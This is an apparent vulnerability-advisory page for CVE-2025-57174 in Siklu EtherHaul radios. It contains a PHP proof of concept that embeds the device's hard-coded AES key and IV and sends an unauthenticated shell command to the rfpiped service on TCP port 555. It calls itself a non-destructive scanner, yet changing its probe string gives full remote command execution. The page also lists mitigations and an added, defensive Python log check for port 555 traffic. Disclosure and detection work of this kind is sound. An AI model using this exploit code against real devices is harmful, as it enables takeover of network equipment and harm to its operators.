| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-57174 | 24 Sep 2025 22:15 | – | circl |
| Ceragon EtherHaul series OS command injection vulnerability | 15 Sep 2025 00:00 | – | cnnvd |
| CVE-2025-57174 | 15 Sep 2025 00:00 | – | cve |
| CVE-2025-57174 | 15 Sep 2025 00:00 | – | cvelist |
| Siklu EtherHaul Series EH-8010 - Remote Command Execution | 17 Jan 2026 00:00 | – | exploitdb |
| EUVD-2025-29202 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2025-57174 | 15 Sep 2025 17:15 | – | nvd |
| Siklu EtherHaul Series EH-8010 / EH-1200 Remote Command Execution | 20 Jan 2026 00:00 | – | packetstorm |
| PT-2025-37368 | 13 Sep 2025 00:00 | – | ptsecurity |
| CVE-2025-57174 | 17 Sep 2025 00:49 | – | redhatcve |
=============================================================================================================================================
| # Title : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.ceragon.com/products/siklu-by-ceragon |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214068/ & CVE-2025-57174
[+] Summary : This PHP-based scanner safely detects an unauthenticated remote command execution vulnerability in Siklu EtherHaul devices by
sending a non-destructive encrypted probe command and validating the response.
The scanner does not alter device state and is suitable for large-scale assessments.
[+] Impact:
Successful detection confirms full unauthenticated RCE exposure.
[+] Mitigation:
- Restrict TCP port 555
- Disable rfpiped service
- Update firmware
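The mitigations above come down to who can reach TCP port 555. As an added example (not part of the original advisory), this Python check reviews connection records for port 555 traffic from outside a management network and marks flows whose client byte count fits the PoC's framing (a 0x90-byte header plus 16-byte-aligned payload). Assumptions: records shaped like Zeek conn.log JSON, a management subnet of 10.20.0.0/24, and constructed sample lines.

```python
import ipaddress
import json

RFPIPE_PORT = 555   # TCP port of the rfpiped service named in the advisory
HDR_LEN = 0x90      # size of the encrypted request header in the PoC
BLOCK = 16          # AES block size; the PoC zero-pads payloads to it

# Assumption: the only network that should ever reach port 555.
MGMT_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed records shaped like Zeek conn.log JSON (orig_bytes = payload
# bytes sent by the client). Addresses are private/documentation ranges.
SAMPLE_LOG = """
{"id.orig_h": "10.20.0.5", "id.resp_h": "192.168.1.10", "id.resp_p": 555, "orig_bytes": 160}
{"id.orig_h": "203.0.113.7", "id.resp_h": "192.168.1.10", "id.resp_p": 555, "orig_bytes": 160}
{"id.orig_h": "198.51.100.9", "id.resp_h": "192.168.1.10", "id.resp_p": 555, "orig_bytes": 0}
{"id.orig_h": "203.0.113.7", "id.resp_h": "192.168.1.10", "id.resp_p": 443, "orig_bytes": 160}
{"id.orig_h": "198.51.100.23", "id.resp_h": "192.168.1.11", "id.resp_p": 555, "orig_bytes": 73}
not json
"""


def classify(rec):
    """Return (source, device, verdict) for a flow of interest, else None."""
    if rec.get("id.resp_p") != RFPIPE_PORT:
        return None
    src = ipaddress.ip_address(rec["id.orig_h"])
    if any(src in net for net in MGMT_NETS):
        return None  # expected management traffic
    sent = rec.get("orig_bytes") or 0
    # A complete PoC-style request is at least one header and block-aligned.
    framed = sent >= HDR_LEN and sent % BLOCK == 0
    return (str(src), rec["id.resp_h"], "rfpipe-framed" if framed else "reachable")


def scan(log_text):
    """Classify every parsable line of a conn log; skip malformed records."""
    findings = []
    for line in log_text.splitlines():
        try:
            hit = classify(json.loads(line))
        except (ValueError, KeyError, AttributeError):
            continue  # blank, non-JSON or incomplete record
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A "reachable" verdict means the port filter is missing for that source; "rfpipe-framed" is the stronger signal and warrants checking the device itself.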
[+] POC: php poc.php 192.168.1.10
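<?php
// Requires the PHP "sockets" and "openssl" extensions (CLI).

define('PORT', 555);        // rfpiped TCP port
define('HDR_LEN', 0x90);    // fixed header size: 144 bytes (9 AES blocks)
define('MAX_RESP', 4096);   // upper bound accepted for the peer-supplied length
define('TIMEOUT', 5);       // socket send/receive timeout in seconds

// Hard-coded initial IV: four little-endian 32-bit words.
$IV0 = pack(
    'V4',
    0xEA703B82,
    0x75A9A17B,
    0x1DFC7BB9,
    0x55A24D72
);

// Hard-coded 256-bit AES key.
$KEY = hex2bin(
    '89e7ffbeeb2d73f5a910fc425b1f3617' .
    '9fb95e7535a342a05d0248b119d24b82'
);

// Read exactly $len bytes, or return false on error, timeout or EOF.
function recv_exact($sock, $len)
{
    $data = '';
    while (strlen($data) < $len) {
        $chunk = @socket_read($sock, $len - strlen($data));
        if ($chunk === false || $chunk === '') {
            return false;
        }
        $data .= $chunk;
    }
    return $data;
}

// Zero-pad to a multiple of the 16-byte AES block size.
function pad16_zero($data)
{
    $r = strlen($data) % 16;
    return $r === 0 ? $data : $data . str_repeat("\x00", 16 - $r);
}

// Byte sum over the header, skipping the checksum field at 0x0C..0x0F.
function hdr_checksum($hdr)
{
    $sum = 0;
    for ($i = 0; $i < 0x0C; $i++) {
        $sum += ord($hdr[$i]);
    }
    for ($i = 0x10; $i < HDR_LEN; $i++) {
        $sum += ord($hdr[$i]);
    }
    return $sum & 0xFFFFFFFF;
}

// Header layout used here: byte 0 = flag, byte 1 = message type,
// 0x08 = payload length (LE32), 0x0C = checksum (LE32), rest zero.
function build_header($flag, $msg, $payload_len)
{
    $hdr = str_repeat("\x00", HDR_LEN);
    $hdr[0] = chr($flag);
    $hdr[1] = chr($msg);
    $hdr = substr_replace($hdr, pack('V', $payload_len), 0x08, 4);
    $hdr = substr_replace($hdr, pack('V', hdr_checksum($hdr)), 0x0C, 4);
    return $hdr;
}

// AES-256-CBC session. Each direction keeps its own IV, which is chained
// from the last ciphertext block of the previous message.
class RFPipeSession
{
    public $key;
    public $send_iv;
    public $recv_iv;

    function __construct($key, $iv)
    {
        $this->key = $key;
        $this->send_iv = $iv;
        $this->recv_iv = $iv;
    }

    // Encrypt block-aligned data and send it.
    function enc_send($sock, $data)
    {
        $ct = openssl_encrypt(
            $data,
            'AES-256-CBC',
            $this->key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->send_iv
        );
        $this->send_iv = substr($ct, -16);
        @socket_write($sock, $ct);
    }

    // Receive and decrypt one fixed-size header.
    function recv_header($sock)
    {
        $ct = recv_exact($sock, HDR_LEN);
        if ($ct === false) return false;
        $pt = openssl_decrypt(
            $ct,
            'AES-256-CBC',
            $this->key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->recv_iv
        );
        $this->recv_iv = substr($ct, -16);
        return $pt;
    }

    // Receive a payload of $len bytes (padded to 16 on the wire) and decrypt it.
    function dec_recv($sock, $len)
    {
        $padded = ($len + 15) & ~15;
        $ct = recv_exact($sock, $padded);
        if ($ct === false) return false;
        $pt = openssl_decrypt(
            $ct,
            'AES-256-CBC',
            $this->key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->recv_iv
        );
        $this->recv_iv = substr($ct, -16);
        return substr($pt, 0, $len);
    }
}

if ($argc < 2) {
    echo "Usage: php {$argv[0]} <target>\n";
    exit;
}

$target = $argv[1];
$probe = "echo VULN_CHECK\x00";   // marker command, NUL-terminated

$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false) {
    echo "[!] Could not create socket\n";
    exit;
}

// Bound every send and receive so an unresponsive host cannot stall the scan.
$tv = ['sec' => TIMEOUT, 'usec' => 0];
socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, $tv);
socket_set_option($sock, SOL_SOCKET, SO_SNDTIMEO, $tv);

if (!@socket_connect($sock, $target, PORT)) {
    echo "[!] Connection failed\n";
    socket_close($sock);
    exit;
}

$sess = new RFPipeSession($KEY, $IV0);
$hdr = build_header(0x00, 0x01, strlen($probe));
$sess->enc_send($sock, $hdr);
$sess->enc_send($sock, pad16_zero($probe));

$resp_hdr = $sess->recv_header($sock);
if ($resp_hdr === false) {
    echo "[?] No response (filtered or patched)\n";
    socket_close($sock);
    exit;
}

$len = unpack('V', substr($resp_hdr, 0x08, 4))[1];
if ($len <= 0) {
    echo "[-] Not Vulnerable\n";
    socket_close($sock);
    exit;
}
// The length comes from the peer: never read more than MAX_RESP bytes.
if ($len > MAX_RESP) {
    echo "[?] Unexpected response length\n";
    socket_close($sock);
    exit;
}

$data = $sess->dec_recv($sock, $len);
if ($data !== false && strpos($data, 'VULN_CHECK') !== false) {
    echo "[+] VULNERABLE: Unauthenticated RCE detected\n";
} else {
    echo "[-] Not Vulnerable\n";
}
socket_close($sock);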
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================